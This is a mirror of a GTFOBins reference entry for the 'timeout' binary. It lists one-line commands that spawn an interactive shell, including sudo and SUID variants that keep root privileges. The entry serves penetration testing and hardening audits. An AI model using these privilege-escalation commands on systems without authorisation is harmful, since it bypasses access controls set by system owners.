mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
10 lines
190 B
Markdown
10 lines
190 B
Markdown
|
---
|
||
|
functions:
|
||
|
execute-interactive:
|
||
|
- code: timeout 7d /bin/sh
|
||
|
sudo-enabled:
|
||
|
- code: sudo timeout --foreground 7d /bin/sh
|
||
|
suid-enabled:
|
||
|
- code: ./timeout 7d /bin/sh -p
|
||
|
---
|